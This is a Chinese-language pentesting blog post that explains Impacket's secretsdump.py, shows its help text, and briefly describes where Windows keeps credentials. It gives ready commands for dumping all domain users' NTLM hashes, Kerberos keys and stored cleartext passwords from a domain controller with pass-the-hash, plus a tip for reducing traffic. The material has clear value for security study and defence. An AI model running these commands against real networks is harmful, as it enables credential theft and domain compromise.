PythonPig's Blog 移动通信 TCP/IP Hacker 后渗透 伪码农

Windows hash dump之secretsdump

2019-07-16
PythonPig

在域渗透的时候经常使用impacket的secretsdump.py来获取域内主机甚至域控上的hash值,secretsdump可以通过多种方法获取{sam, secrets, cached and ntds}中保存的用户凭证。

图片来源于http://blog.extremehacking.org/blog/2017/06/19/make-hashdump-module-work-windows-10-sam-mode/ 今天并不讲secretsdump.py的实现方法,也许某天不忙的时候会分析一下其具体实现细节。今天主要借助secretsdump.py了解一下用户凭证在windows系统中是如何存储的。 本文的主要内容:
1、secretsdump.py的使用
2、用户凭证在windows系统如何存储

#0x00 secretsdump.py的使用:

直接查看帮助是便捷且有效的方法

secretsdump.py -h:
Impacket v0.9.20-dev - Copyright 2019 SecureAuth Corporation

usage: secretsdump.py [-h] [-debug] [-system SYSTEM] [-bootkey BOOTKEY]
                      [-security SECURITY] [-sam SAM] [-ntds NTDS]
                      [-resumefile RESUMEFILE] [-outputfile OUTPUTFILE]
                      [-use-vss] [-exec-method [{smbexec,wmiexec,mmcexec}]]
                      [-just-dc-user USERNAME] [-just-dc] [-just-dc-ntlm]
                      [-pwd-last-set] [-user-status] [-history]
                      [-hashes LMHASH:NTHASH] [-no-pass] [-k]
                      [-aesKey hex key] [-dc-ip ip address]
                      [-target-ip ip address]
                      target

Performs various techniques to dump secrets from the remote machine without
executing any agent there.

positional arguments:
  target                [[domain/]username[:password]@]<targetName or address>
                        or LOCAL (if you want to parse local files)

optional arguments:
  -h, --help            show this help message and exit
  -debug                Turn DEBUG output ON
  -system SYSTEM        SYSTEM hive to parse
  -bootkey BOOTKEY      bootkey for SYSTEM hive
  -security SECURITY    SECURITY hive to parse
  -sam SAM              SAM hive to parse
  -ntds NTDS            NTDS.DIT file to parse
  -resumefile RESUMEFILE
                        resume file name to resume NTDS.DIT session dump (only
                        available to DRSUAPI approach). This file will also be
                        used to keep updating the session's state
  -outputfile OUTPUTFILE
                        base output filename. Extensions will be added for
                        sam, secrets, cached and ntds
  -use-vss              Use the VSS method insead of default DRSUAPI
  -exec-method [{smbexec,wmiexec,mmcexec}]
                        Remote exec method to use at target (only when using
                        -use-vss). Default: smbexec

display options:
  -just-dc-user USERNAME
                        Extract only NTDS.DIT data for the user specified.
                        Only available for DRSUAPI approach. Implies also
                        -just-dc switch
  -just-dc              Extract only NTDS.DIT data (NTLM hashes and Kerberos
                        keys)
  -just-dc-ntlm         Extract only NTDS.DIT data (NTLM hashes only)
  -pwd-last-set         Shows pwdLastSet attribute for each NTDS.DIT account.
                        Doesn't apply to -outputfile data
  -user-status          Display whether or not the user is disabled
  -history              Dump password history, and LSA secrets OldVal

authentication:
  -hashes LMHASH:NTHASH
                        NTLM hashes, format is LMHASH:NTHASH
  -no-pass              don't ask for password (useful for -k)
  -k                    Use Kerberos authentication. Grabs credentials from
                        ccache file (KRB5CCNAME) based on target parameters.
                        If valid credentials cannot be found, it will use the
                        ones specified in the command line
  -aesKey hex key       AES key to use for Kerberos Authentication (128 or 256
                        bits)

connection:
  -dc-ip ip address     IP Address of the domain controller. If ommited it use
                        the domain part (FQDN) specified in the target
                        parameter
  -target-ip ip address
                        IP Address of the target machine. If omitted it will
                        use whatever was specified as target. This is useful
                        when target is the NetBIOS name and you cannot resolve
                        it

基本使用方法:

python secretsdump.py domain/username@10.10.10.10 -hashes LM HASH:NT HASH 

secretsdump.py主要从SAM、LSA secrets(包括 cached creds)和域控的NTDS.dit(包括Supplemental Credentials,可能有明文密码)三处获取用户凭证,唯一的一点是不能dump LSASS进程在内存中的数据。
1、导出域内所有用户ntlm hash(通过预控上的ntds.dit数据库获取)

python secretsdump.py domain/username@10.10.10.10 -hashes LM HASH:NT HASH  -just-dc-ntlm -outputfile tmp

2、导出域内所有用户的ntlm hash、Kerberos keys和Domain Credentials(Supplemental Credentials,可能保存有明文密码,secretsdump生成的文件以cleartext为后缀)。-just-dc能导出用户明文密码(如果明文保存在Supplemental Credentials的话,-just-dc-ntlm只能导出lm hash和nt hash)

python secretsdump.py domain/username@10.10.10.10 -hashes LM HASH:NT HASH  -just-dc -outputfile tmp

3、secretsdump.py会把结果打印到标准输出,而渗透过程中可能会经过多个跳板机在内网运行secretsdump,这样可能产生额外流量,为了避免这种情况,可以把输出定向到/dev/null。

python secretsdump.py domain/username@10.10.10.10 -hashes LM HASH:NT HASH  -just-dc-ntlm -outputfile tmp >/dev/null

#0x01 用户凭证在windows系统如何存储:

查看微软官方的说明 用户凭证在windows系统中的存储情况

根据微软官网的介绍,用户凭证一般存储在SAM、LSA secrets、NTDS.DIT和LSASS进程的内存中,另外系统缓存中也有可能存在用户凭证,参见:
Cached Domain Credentials
Interactive logon: Number of previous logons to cache (in case domain controller is not available)

secretsdump可以从SAM、LSA secrets(包括 cached creds)和域控的NTDS.dit获取用户凭证,LSASS进程的内存数据通过绕过杀软导出域内用户hash的方法记录获取。

参考


Similar Posts

Comments